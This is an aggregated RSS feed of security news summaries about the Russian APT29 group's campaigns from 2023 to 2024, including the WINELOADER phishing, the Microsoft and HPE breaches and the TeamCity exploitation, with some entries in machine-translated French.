This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-21T06:34:23+00:00 www.secnews.physaphae.fr Mandiant - Blog Sécu de Mandiant   Executive Summary The election cybersecurity landscape globally is characterized by a diversity of targets, tactics, and threats. Elections attract threat activity from a variety of threat actors including: state-sponsored actors, cyber criminals, hacktivists, insiders, and information operations as-a-service entities. Mandiant assesses with high confidence that state-sponsored actors pose the most serious cybersecurity risk to elections. Operations targeting election-related infrastructure can combine cyber intrusion activity, disruptive and destructive capabilities, and information operations, which include elements of public-facing advertisement and amplification of threat activity claims. Successful targeting does not automatically translate to high impact. Many threat actors have struggled to influence or achieve significant effects, despite their best efforts.  When we look across the globe we find that the attack surface of an election involves a wide variety of entities beyond voting machines and voter registries. In fact, our observations of past cycles indicate that cyber operations target the major players involved in campaigning, political parties, news and social media more frequently than actual election infrastructure.   Securing elections requires a comprehensive understanding of many types of threats and tactics, from distributed denial of service (DDoS) to data theft to deepfakes, that are likely to impact elections in 2024. It is vital to understand the variety of relevant threat vectors and how they relate, and to ensure mitigation strategies are in place to address the full scope of potential activity.  Election organizations should consider steps to harden infrastructure against common attacks, and utilize account security tools such as Google\'s Advanced Protection Program to protect high-risk accounts. Introduction  The 2024 global election cybersecurity landscape is characterized by a diversity of targets, tactics, and threats. An expansive ecosystem of systems, administrators, campaign infrastructure, and public communications venues must be secured against a diverse array of operators and methods. Any election cybersecurity strategy should begin with a survey of the threat landscape to build a more proactive and tailored security posture.  The cybersecurity community must keep pace as more than two billion voters are expected to head to the polls in 2024. With elections in more than an estimated 50 countries, there is an opportunity to dynamically track how threats to democracy evolve. Understanding how threats are targeting one country will enable us to better anticipate and prepare for upcoming elections globally. At the same time, we must also appreciate the unique context of different countries. Election threats to South Africa, India, and the United States will inevitably differ in some regard. In either case, there is an opportunity for us to prepare with the advantage of intelligence.  ]]> 2024-04-25T10:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections/ www.secnews.physaphae.fr/article.php?IdArticle=8500393 False Ransomware,Malware,Hack,Tool,Vulnerability,Threat,Legislation,Cloud,Technical APT 43,APT 29,APT 31,APT 42,APT 28,APT 40 3.0000000000000000 ProofPoint - Cyber Firms 2024-04-12T06:00:03+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/defeating-malicious-application-creation-attacks www.secnews.physaphae.fr/article.php?IdArticle=8480713 False Spam,Malware,Tool,Threat,Cloud APT 29 3.0000000000000000 Bleeping Computer - Magazine Américain CISA has issued a new emergency directive ordering U.S. federal agencies to address risks resulting from the breach of multiple Microsoft corporate email accounts by the Russian APT29 hacking group. [...]]]> 2024-04-11T13:47:19+00:00 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-impacted-by-microsoft-hack-to-mitigate-risks/ www.secnews.physaphae.fr/article.php?IdArticle=8480159 False Hack APT 29 3.0000000000000000 ProofPoint - Cyber Firms 2024-04-11T13:27:54+00:00 https://www.proofpoint.com/us/blog/cloud-security/revisiting-mact-malicious-applications-credible-cloud-tenants www.secnews.physaphae.fr/article.php?IdArticle=8480061 False Malware,Threat,Prediction,Cloud APT 29 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Mandiant observes what it claims is the first ever APT29 campaign aimed at political parties]]> 2024-03-25T09:30:00+00:00 https://www.infosecurity-magazine.com/news/russian-cozy-bear-group-targets/ www.secnews.physaphae.fr/article.php?IdArticle=8470067 False None APT 29 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The WINELOADER backdoor used in recent cyber attacks targeting diplomatic entities with wine-tasting phishing lures has been attributed as the handiwork of a hacking group with links to Russia\'s Foreign Intelligence Service (SVR), which was responsible for breaching SolarWinds and Microsoft. The findings come from Mandiant, which said Midnight Blizzard (aka APT29, BlueBravo, or]]> 2024-03-23T11:33:00+00:00 https://thehackernews.com/2024/03/russian-hackers-use-wineloader-malware.html www.secnews.physaphae.fr/article.php?IdArticle=8468914 False Malware APT 29 2.0000000000000000 Mandiant - Blog Sécu de Mandiant Executive SummaryIn late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German political parties with a CDU-themed lure.  This is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions.Based on the SVR\'s responsibility to collect political intelligence and this APT29 cluster\'s historical targeting patterns, we judge this activity to present a broad threat to European and other Western political parties from across the political]]> 2024-03-22T11:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties www.secnews.physaphae.fr/article.php?IdArticle=8469994 False Threat APT 29 2.0000000000000000 Mandiant - Blog Sécu de Mandiant   Executive Summary In late February, APT29 used a new backdoor variant publicly tracked as WINELOADER to target German political parties with a CDU-themed lure.   This is the first time we have seen this APT29 cluster target political parties, indicating a possible area of emerging operational focus beyond the typical targeting of diplomatic missions. Based on the SVR\'s responsibility to collect political intelligence and this APT29 cluster\'s historical targeting patterns, we judge this activity to present a broad threat to European and other Western political parties from across the political spectrum. Please see the Technical Annex for technical details and MITRE ATT&CK techniques, (T1543.003, T1012, T1082, T1134, T1057, T1007, T1027, T1070.004, T1055.003 and T1083) Threat Detail In late February 2024, Mandiant identified APT29 - a Russian Federation backed threat group linked by multiple governments to Russia\'s Foreign Intelligence Service (SVR) - conducting a phishing campaign targeting German political parties. Consistent with APT29 operations extending back to 2021, this operation leveraged APT29\'s mainstay first-stage payload ROOTSAW (aka EnvyScout) to deliver a new backdoor variant publicly tracked as WINELOADER.  Notably, this activity represents a departure from this APT29 initial access cluster\'s typical remit of targeting governments, foreign embassies, and other diplomatic missions, and is the first time Mandiant has seen an operational interest in political parties from this APT29 subcluster. Additionally, while APT29 has previously used lure documents bearing the logo of German government organizations, this is the first instance where we have seen the group use German-language lure content - a possible artifact of the targeting differences (i.e. domestic vs. foreign) between the two operations.  Phishing emails were sent to victims purporting to be an invite to a dinner reception on 01 March bearing a logo from the Christian Democratic Union (CDU), a major political party in Germany (see Figure 1).  The German-language lure document contains a phishing link directing victims to a malicious ZIP file containing a ROOTSAW dropper hosted on an actor-controlled compromised website “https://waterforvoiceless[.]org/invite.php”.  ROOTSAW delivered a second-stage CDU-themed lure document and a next stage WINELOADER payload retrieved from “waterforvoiceless[.]org/util.php”.  WINELOADER was first observed in operational use in late January 2024 in an operation targeting likely diplomatic entities in Czechia, Germany, India, Italy, Latvia, and Peru.  The backdoor contains several features and functions that overlap with several known APT29 malware families including BURNTBATTER, MUSKYBEAT and BEATDROP, indicating they are likely created by a common developer (see Technical Annex for additional details). ]]> 2024-03-22T00:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/apt29-wineloader-german-political-parties/ www.secnews.physaphae.fr/article.php?IdArticle=8500402 False Malware,Threat,Cloud,Technical APT 29 3.0000000000000000 HackRead - Chercher Cyber Par deeba ahmed Midnight Blizzard (alias Cozy Bear et APT29) a initialement violé Microsoft le 12 janvier 2024. Ceci est un article de HackRead.com Lire le post original: Les pirates russes de Blizzard Midnight ont violé le code source Microsoft

---

>By Deeba Ahmed Midnight Blizzard (aka Cozy Bear and APT29) originally breached Microsoft on January 12, 2024. This is a post from HackRead.com Read the original post: Russian Midnight Blizzard Hackers Breached Microsoft Source Code]]> 2024-03-11T12:19:02+00:00 https://www.hackread.com/russia-midnight-blizzard-hackers-microsoft-source-code/ www.secnews.physaphae.fr/article.php?IdArticle=8462118 False None APT 29 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Threat group APT29 is using secrets stolen in an earlier attack to compromise Microsoft\'s internal systems]]> 2024-03-11T09:30:00+00:00 https://www.infosecurity-magazine.com/news/russias-midnight-blizzard/ www.secnews.physaphae.fr/article.php?IdArticle=8462049 False Threat APT 29 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Microsoft on Friday revealed that the Kremlin-backed threat actor known as Midnight Blizzard (aka APT29 or Cozy Bear) managed to gain access to some of its source code repositories and internal systems following a hack that came to light in January 2024. "In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our]]> 2024-03-09T09:31:00+00:00 https://thehackernews.com/2024/03/microsoft-confirms-russian-hackers.html www.secnews.physaphae.fr/article.php?IdArticle=8461117 False Hack,Threat APT 29 3.0000000000000000 CyberScoop - scoopnewsgroup.com special Cyber Un incident attribué à l'équipage de piratage russe confortable ours qui a été divulgué pour la première fois en janvier continue d'affecter Microsoft Systems.

---

>An incident attributed to the Russian hacking crew Cozy Bear that was first disclosed in January continues to affect Microsoft systems. ]]> 2024-03-08T20:41:15+00:00 https://cyberscoop.com/microsoft-cozy-bear-russia/ www.secnews.physaphae.fr/article.php?IdArticle=8460972 False None APT 29 3.0000000000000000 TechRepublic - Security News US Cyber espionage group APT29 is adapting its tactics for cloud environments. Here\'s what you should know.]]> 2024-03-01T20:15:10+00:00 https://www.techrepublic.com/article/ncsc-uk-svr-cyber-threat-actors/ www.secnews.physaphae.fr/article.php?IdArticle=8457678 False Cloud APT 29 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity and intelligence agencies from the Five Eyes nations have released a joint advisory detailing the evolving tactics of the Russian state-sponsored threat actor known as APT29. The hacking outfit, also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes, is assessed to be affiliated with the Foreign Intelligence Service (SVR) of the]]> 2024-02-27T16:04:00+00:00 https://thehackernews.com/2024/02/five-eyes-agencies-expose-apt29s.html www.secnews.physaphae.fr/article.php?IdArticle=8455808 False Threat,Cloud APT 29 3.0000000000000000 The Register - Site journalistique Anglais Kremlin\'s spies tried out the TTPs on Microsoft, and now they\'re off to the races Russia\'s notorious Cozy Bear, the crew behind the SolarWinds supply chain attack, has expanded its targets and evolved its techniques to break into organizations\' cloud environments, according to the Five Eyes governments.…]]> 2024-02-27T01:00:06+00:00 https://go.theregister.com/feed/www.theregister.com/2024/02/27/russia_cozy_bear_new_ttps/ www.secnews.physaphae.fr/article.php?IdArticle=8455631 False Cloud APT 29 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Known as Midnight Blizzard, the Dukes or Cozy Bear, the group has been identified as a Russian entity likely operating under the SVR]]> 2024-02-26T17:15:00+00:00 https://www.infosecurity-magazine.com/news/cisa-alert-apt29s-cloud-tactics/ www.secnews.physaphae.fr/article.php?IdArticle=8455490 False Cloud APT 29 2.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2024-02-09T09:20:11+00:00 https://www.globalsecuritymag.fr/l-attaque-d-apt29-contre-microsoft-suivre-les-traces-de-cozy-bear-analyse-de.html www.secnews.physaphae.fr/article.php?IdArticle=8448321 False None APT 29 2.0000000000000000 CyberArk - Software Vendor A new and concerning chapter has unfolded in these troubled times of geopolitical chaos. The Cozy Bear threat actor has caused significant breaches targeting Microsoft and HPE, and more are likely to come. These recent...]]> 2024-02-08T14:51:00+00:00 https://www.cyberark.com/blog/apt29s-attack-on-microsoft-tracking-cozy-bears-footprints/ www.secnews.physaphae.fr/article.php?IdArticle=8448041 False Threat APT 29 3.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Pour les dernières découvertes en cyberLes meilleures attaques et violations à la suite des rapports sur l'APT29 affiliée à la Russie (alias Cozy Bear, Midnight Blizzard) contre Microsoft, également Hewlett-Packard Enterprise ont reconnu avoir été attaqué par le même acteur de menace.Tandis que Microsoft a détecté la violation de janvier [& # 8230;]

---

>For the latest discoveries in cyber research for the week of 29th January, please download our Threat_Intelligence Bulletin. TOP ATTACKS AND BREACHES Following the reports on Russia-affiliated APT29 (AKA Cozy Bear, Midnight Blizzard) attack against Microsoft, also Hewlett-Packard Enterprise acknowledged it was attacked by the same threat actor. While Microsoft detected the breach on January […] ]]> 2024-01-29T13:51:49+00:00 https://research.checkpoint.com/2024/29th-january-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8444429 False Threat APT 29 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it\'s currently beginning to notify them. The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew]]> 2024-01-26T11:33:00+00:00 https://thehackernews.com/2024/01/microsoft-warns-of-widening-apt29.html www.secnews.physaphae.fr/article.php?IdArticle=8443285 False Threat APT 29 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Hewlett Packard Enterprise reveals that Russian state APT29 hackers stole data from corporate mailboxes]]> 2024-01-25T09:30:00+00:00 https://www.infosecurity-magazine.com/news/hpe-solarwinds-hackers-accessed/ www.secnews.physaphae.fr/article.php?IdArticle=8442894 False None APT 29 3.0000000000000000 Recorded Future - FLux Recorded Future Des pirates avec des liens présumés avec le gouvernement russe ont eu accès au fabricant de technologies Hewlett Packard Enterprise Co. \'S (HPE) Environnement de messagerie basé sur le cloud, a annoncé mercredi la société.Dans un Déposant avec des régulateurs SEC le mercredi après-midi, HPE a déclaré qu'il avait été informé le 12 décembre que des pirates se connectaient à confort

---

Hackers with suspected ties to the Russian government gained access to the technology manufacturer Hewlett Packard Enterprise Co.\'s (HPE) cloud-based email environment, the company said Wednesday. In a filing with SEC regulators on Wednesday afternoon, HPE said it was notified on December 12 that hackers connected to Cozy Bear, also known as Midnight Blizzard, had]]> 2024-01-24T22:15:00+00:00 https://therecord.media/hpe-tells-sec-breached-by-cozy-bear www.secnews.physaphae.fr/article.php?IdArticle=8442718 False None APT 29 3.0000000000000000 knowbe4 - cybersecurity services dans un vendredi Fileling de réglementation , Microsoft a euont indiqué que ses comptes de messagerie d'entreprise ont été compromis par un groupe de piratage parrainé par l'État russe connu sous le nom de Midnight Blizzard, également identifié comme Nobelium ou APT29.La divulgation de Microsoft s'aligne sur les nouvelles exigences américaines pour la déclaration des incidents de cybersécurité.L'attaque a été détectée le 12 janvier 2023, mais elle semble avoir commencé en novembre 2023. La brèche et l'attaque L'attaque a impliqué des pirates russes à l'aide d'une attaque en pulvérisation de mot de passe pour accéder à un compte de locataire de test non production hérité de Microsoft.La pulvérisation de mot de passe est une technique de force brute où les attaquants tentent de se connecter à l'aide d'une liste de noms d'utilisateur et de mots de passe potentiels.

---

In a Friday regulatory filing, Microsoft has reported that its corporate email accounts were compromised by a Russian state-sponsored hacking group known as Midnight Blizzard, also identified as Nobelium or APT29. Microsoft\'s disclosure aligns with new U.S. requirements for reporting cybersecurity incidents. The attack was detected on January 12th, 2023, but it appears to have started in November 2023.The Breach and AttackThe attack involved Russian hackers using a password spray attack to access a legacy non-production test tenant account at Microsoft. Password spraying is a brute force technique where attackers attempt to log in using a list of potential usernames and passwords.]]> 2024-01-20T14:45:06+00:00 https://blog.knowbe4.com/russian-hackers-win-big-microsofts-senior-exec-team-emails-breached www.secnews.physaphae.fr/article.php?IdArticle=8441002 False None APT 29 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Description Russian Foreign Intelligence Service (SVR) cyber actors-also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard-are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023. Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer\'s source code, signing certificates, and the ability to subvert software compilation and deployment processes-access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, limited number and seemingly opportunistic types of victims currently identified, indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments. #### Reference URL(s) 1. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a #### Publication Date December 12, 2023 #### Author(s) CISA ]]> 2023-12-20T21:21:37+00:00 https://community.riskiq.com/article/4dba0576 www.secnews.physaphae.fr/article.php?IdArticle=8426379 False Threat APT 29 3.0000000000000000 HackRead - Chercher Cyber Par waqas Les autorités polonaises et les laboratoires Fortiguard ont émis un avertissement aux clients d'une nouvelle vague de cyberattaques associées à TeamCity. Ceci est un article de HackRead.com Lire le post original: L'APT29 russe a piraté le géant biomédical américain en violation liée à l'équipe

---

>By Waqas Polish authorities and FortiGuard Labs have issued a warning to customers about a new wave of cyberattacks associated with TeamCity. This is a post from HackRead.com Read the original post: Russian APT29 Hacked US Biomedical Giant in TeamCity-Linked Breach]]> 2023-12-15T00:15:19+00:00 https://www.hackread.com/russian-apt29-hacked-us-biomedical-teamcity/ www.secnews.physaphae.fr/article.php?IdArticle=8422928 False None APT 29 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It\'s notable for the supply chain]]> 2023-12-14T16:02:00+00:00 https://thehackernews.com/2023/12/russian-svr-linked-apt29-targets.html www.secnews.physaphae.fr/article.php?IdArticle=8422584 False Threat APT 29 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine The FBI and CISA detected that hackers linked to the Russian foreign intelligence service (SVR) have been targeting a JetBrains TeamCity vulnerability since September 2023]]> 2023-12-14T15:30:00+00:00 https://www.infosecurity-magazine.com/news/cozy-bear-russia-jetbrains-teamcity/ www.secnews.physaphae.fr/article.php?IdArticle=8422706 False Vulnerability APT 29 3.0000000000000000 Dark Reading - Informationweek Branch Russia\'s APT29 is going after a critical RCE flaw in the JetBrains TeamCity software developer platform, prompting governments worldwide to issue an urgent warning to patch.]]> 2023-12-13T23:26:00+00:00 https://www.darkreading.com/vulnerabilities-threats/global-teamcity-exploitation-opens-door-to-solarwinds-style-nightmare www.secnews.physaphae.fr/article.php?IdArticle=8422329 False Threat APT 29 3.0000000000000000 Fortinet - Fabricant Materiel Securite FortiGuardLabs discovered a new APT29 campaign which includes TeamCity exploitation and GraphicalProton malware. Learn more.]]> 2023-12-13T15:00:00+00:00 https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793 www.secnews.physaphae.fr/article.php?IdArticle=8422188 False Malware APT 29 3.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2023-11-24T09:30:46+00:00 https://www.globalsecuritymag.fr/APT-29-exploite-WinRAR-pour-attaquer-des-ambassades-en-Europe.html www.secnews.physaphae.fr/article.php?IdArticle=8416529 False None APT 29,APT 29 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Threat group may be looking for intel on Azerbaijan]]> 2023-11-20T10:00:00+00:00 https://www.infosecurity-magazine.com/news/russias-apt29-embassies-ngrok/ www.secnews.physaphae.fr/article.php?IdArticle=8414772 False Threat APT 29,APT 29 3.0000000000000000 Bleeping Computer - Magazine Américain After Sandworm and APT28 (known as Fancy Bear), another state-sponsored Russian hacker group, APT29, is leveraging the CVE-2023-38831 vulnerability in WinRAR for cyberattacks. [...]]]> 2023-11-19T11:14:25+00:00 https://www.bleepingcomputer.com/news/security/russian-hackers-use-ngrok-feature-and-winrar-exploit-to-attack-embassies/ www.secnews.physaphae.fr/article.php?IdArticle=8414888 False Vulnerability,Threat APT 29,APT 28 3.0000000000000000 Recorded Future - FLux Recorded Future Les pirates russes parrainés par l'État ont ciblé des ambassades et des organisations internationales dans une récente campagne de cyber-espionnage, ont révélé que les chercheurs du gouvernement ukrainien ont révélé.Les attaques ont été attribuées au tristement célèbre groupe de pirates étiqueté APT29, également connu sous le nom de confortable ours ou de bravo bleu.Auparavant, les analystes l'ont lié au service de renseignement étranger de la Russie (SVR), qui rassemble

---

Russian state-sponsored hackers have targeted embassies and international organizations in a recent cyber-espionage campaign, Ukrainian government cybersecurity researchers have found. The attacks were attributed to the infamous hacker group labeled APT29, also known as Cozy Bear or Blue Bravo. Analysts previously have linked it to Russia\'s Foreign Intelligence Service (SVR), which gathers political and economic]]> 2023-11-14T16:34:00+00:00 https://therecord.media/cyber-espionage-campaign-embassies-apt29-cozy-bear www.secnews.physaphae.fr/article.php?IdArticle=8411945 False None APT 29,APT 29 3.0000000000000000 Bleeping Computer - Magazine Américain The U.S. Securities and Exchange Commission (SEC) today charged SolarWinds with defrauding investors by allegedly concealing cybersecurity defense issues before a December 2020 linked to APT29, the Russian Foreign Intelligence Service (SVR) hacking division. [...]]]> 2023-10-30T17:54:13+00:00 https://www.bleepingcomputer.com/news/security/sec-sues-solarwinds-for-misleading-investors-before-2020-hack/ www.secnews.physaphae.fr/article.php?IdArticle=8403150 False Hack APT 29,Solardwinds 3.0000000000000000 AhnLab - Korean Security Firm août 2023 Problèmes majeurs sur les groupes de l'APT 1) Andariel 2) APT29 3) APT31 4) amer 5)Bronze Starlight 6) Callisto 7) Cardinbee 8) Typhoon de charbon de bois (Redhotel) 9) Terre estrie 10) Typhon de lin 11) Groundpeony 12) Chisel infâme 13) Kimsuky 14) Lazarus 15)Moustachedbouncher 16) Éléphant mystérieux (APT-K-47) 17) Nobelium (Blizzard de minuit) 18) Red Eyes (APT37) Aug_Thereat Trend Rapport sur les groupes APT

---

August 2023 Major Issues on APT Groups 1) Andariel 2) APT29 3) APT31 4) Bitter 5) Bronze Starlight 6) Callisto 7) Carderbee 8) Charcoal Typhoon (RedHotel) 9) Earth Estries 10) Flax Typhoon 11) GroundPeony 12) Infamous Chisel 13) Kimsuky 14) Lazarus 15) MoustachedBouncher 16) Mysterious Elephant (APT-K-47) 17) Nobelium (Midnight Blizzard) 18) Red Eyes (APT37) Aug_Threat Trend Report on APT Groups ]]> 2023-10-23T02:22:16+00:00 https://asec.ahnlab.com/en/57930/ www.secnews.physaphae.fr/article.php?IdArticle=8399124 False Threat,Prediction APT 38,APT 38,APT 29,APT 37,APT 31 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Key Insights APT29\'s pace of operations and emphasis on Ukraine increased in the first half of 2023 as Kyiv launched its counteroffensive, pointing to the SVR\'s central role in collecting intelligence concerning the current pivotal phase of the war. During this period, Mandiant has tracked substantial changes in APT29\'s tooling and tradecraft, likely designed to support the increased frequency and scope of operations and hinder forensic analysis.  APT29 has used various infection chains simultaneously across different operations, indicating that distinct initial access operators or]]> 2023-09-21T09:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing www.secnews.physaphae.fr/article.php?IdArticle=8386704 False None APT 29 3.0000000000000000 AhnLab - Korean Security Firm juillet 2023 Problèmes majeurs sur les groupes APT 1) APT28 2) APT29 3) APT31 4) Camouflaged Hunter 5) Chicheur charmant 6) Gamaredon 7) Kimsuky 8) Konni 9) Lazarus 10) Mustang Panda 11) Patchwork 12) Eyes rouges 13) Pirates d'espace 14) Turla 15) ATIP_2023_JUL_JULAT RAPPORT D'APTER LE Rapport sur les APT

---

July 2023 Major Issues on APT Groups 1) APT28 2) APT29 3) APT31 4) Camouflaged Hunter 5) Charming Kitten 6) Gamaredon 7) Kimsuky 8) Konni 9) Lazarus 10) Mustang Panda 11) Patchwork 12) Red Eyes 13) Space Pirates 14) Turla 15) Unclassified ATIP_2023_Jul_Threat Trend Report on APT Groups ]]> 2023-09-11T05:02:48+00:00 https://asec.ahnlab.com/en/56971/ www.secnews.physaphae.fr/article.php?IdArticle=8381128 False Threat,Prediction APT 38,APT 35,APT 35,APT 29,APT 29,APT 37,APT 37,APT 31,APT 28,APT 28 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors. The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock,]]> 2023-08-17T15:09:00+00:00 https://thehackernews.com/2023/08/russian-hackers-use-zulip-chat-app-for.html www.secnews.physaphae.fr/article.php?IdArticle=8371161 False Malware,Threat APT 29 2.0000000000000000 knowbe4 - cybersecurity services récent de Microsoft \\ Article de blog Les sourcils ont haussé les sourcils à travers la communauté de la cybersécurité.Les pirates d'État liés à la Russie, connus sous le nom d'APT29 ou confortable, ont exécuté des attaques de phishing «hautement ciblées» via la plate-forme des équipes de Microsoft \\.Ce sont les mêmes pirates derrière l'historique Solarwinds Hack en 2020 et la violation de 2016 du Comité national démocrate. La méthode était à la fois sophistiquée et alarmante.En compromettant les comptes Microsoft 365 appartenant à des petites entreprises, les pirates ont créé des domaines pour tromper leurs cibles via des messages Microsoft Teams.Ils ont engagé des utilisateurs et obtenu l'approbation des invites en MFA, contournant ce qui est généralement considéré comme une mesure de sécurité robuste. & Nbsp;

---

Microsoft\'s recent blog post raised eyebrows through the cybersecurity community. State-backed hackers linked to Russia, known as APT29 or Cozy Bear, have executed “highly targeted” phishing attacks through Microsoft\'s Teams platform. These are the same hackers behind the historic SolarWinds hack in 2020 and the 2016 breach of the Democratic National Committee.The method was both sophisticated and alarmingly simple. By compromising Microsoft 365 accounts owned by small businesses, the hackers created domains to deceive their targets through Microsoft Teams messages. They engaged users and elicited approval of MFA prompts, bypassing what is usually considered a robust security measure. ]]> 2023-08-06T14:22:10+00:00 https://blog.knowbe4.com/russian-hackers-breached-government-agencies-mfa-using-microsoft-teams-is-your-business-next www.secnews.physaphae.fr/article.php?IdArticle=8366414 False None APT 29,APT 29 4.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Les acteurs de la menace parrainés par l'État continuent d'exploiter les services cloud légitimes, et en particulier un groupe, l'APT29 russe (également connu sous le nom de confortable ours, Ursa masqué, Bluebravo, Midnight Blizzard et anciennement Nobelium), semble particulièrement actif.Entre mars et mai 2023, les chercheurs en sécurité du groupe INSIKT de Future \\ ont déniché une campagne de cyber-espionnage par la même [& # 8230;]

---

>State-sponsored threat actors continue to exploit legitimate cloud services, and especially one group, the Russian APT29 (also known as Cozy Bear, Cloaked Ursa, BlueBravo, Midnight Blizzard, and formerly Nobelium), seems to be particularly active. Between March and May 2023, security researchers at Recorded Future\'s Insikt Group have unearthed a cyber espionage campaign by the same […] ]]> 2023-08-04T16:48:11+00:00 https://www.netskope.com/blog/cloud-threats-memo-russian-state-sponsored-threat-actors-increasingly-exploiting-legitimate-cloud-services www.secnews.physaphae.fr/article.php?IdArticle=8365743 False Threat,Cloud APT 29,APT 29 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Microsoft on Wednesday disclosed that it identified a set of highly targeted social engineering attacks mounted by a Russian nation-state threat actor using credential theft phishing lures sent as Microsoft Teams chats. The tech giant attributed the attacks to a group it tracks as Midnight Blizzard (previously Nobelium). It\'s also called APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes.]]> 2023-08-03T12:08:00+00:00 https://thehackernews.com/2023/08/microsoft-exposes-russian-hackers.html www.secnews.physaphae.fr/article.php?IdArticle=8365093 False Threat APT 29 2.0000000000000000 Recorded Future - FLux Recorded Future Les pirates au sein de l'armée russe ont utilisé des discussions sur les équipes de Microsoft comme des leurres de phishing dans des «attaques d'ingénierie sociale hautement ciblées», selon des responsables de la sécurité de Microsoft.Le géant de la technologie a déclaré mercredi qu'il avait découvert une campagne d'un groupe de piratage russe prolifique qu'ils appellent Midnight Blizzard, mais est le plus communément appelé Nobelium, confortable ours ou APT29.

---

Hackers within the Russian military used Microsoft Teams chats as phishing lures in “highly targeted social engineering attacks,” according to security officials at Microsoft. The tech giant said on Wednesday it uncovered a campaign by a prolific Russian hacking group they call Midnight Blizzard but is most commonly known as NOBELIUM, Cozy Bear or APT29.]]> 2023-08-02T20:47:00+00:00 https://therecord.media/russian-hackers-sent-phishing-lures www.secnews.physaphae.fr/article.php?IdArticle=8364908 False None APT 29,APT 29 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Russian nation-state actor known as BlueBravo has been observed targeting diplomatic entities throughout Eastern Europe with the goal of delivering a new backdoor called GraphicalProton, exemplifying the continuous evolution of the threat. The phishing campaign is characterized by the use of legitimate internet services (LIS) for command-and-control (C2) obfuscation, Recorded Future said in]]> 2023-07-28T14:24:00+00:00 https://thehackernews.com/2023/07/bluebravo-deploys-graphicalproton.html www.secnews.physaphae.fr/article.php?IdArticle=8362655 False None APT 29,APT 29 2.0000000000000000 Dark Reading - Informationweek Branch Cloaked Ursa/Nobelium gets creative by appealing to the more personal needs of government employees on foreign missions in Kyiv.]]> 2023-07-13T15:48:58+00:00 https://www.darkreading.com/endpoint/solarwinds-attackers-bmws-spy-diplomats www.secnews.physaphae.fr/article.php?IdArticle=8356067 False None APT 29 4.0000000000000000 AhnLab - Korean Security Firm Les cas de grands groupes APT pour le mai 2023 réunis à partir de documents rendus publics par des sociétés de sécurité et des institutions sont comme commesuit.& # 8211;Agrius & # 8211;Andariel & # 8211;APT28 & # 8211;APT29 & # 8211;APT-C-36 (Blind Eagle) & # 8211;Camaro Dragon & # 8211;CloudWizard & # 8211;Earth Longzhi (APT41) & # 8211;Goldenjackal & # 8211;Kimsuky & # 8211;Lazarus & # 8211;Lancefly & # 8211;Oilalpha & # 8211;Red Eyes (Apt37, Scarcruft) & # 8211;Sidecopy & # 8211;Sidewinder & # 8211;Tribu transparente (APT36) & # 8211;Volt Typhoon (Silhouette de bronze) ATIP_2023_MAY_TRADEAT Rapport sur les groupes APT_20230609

---

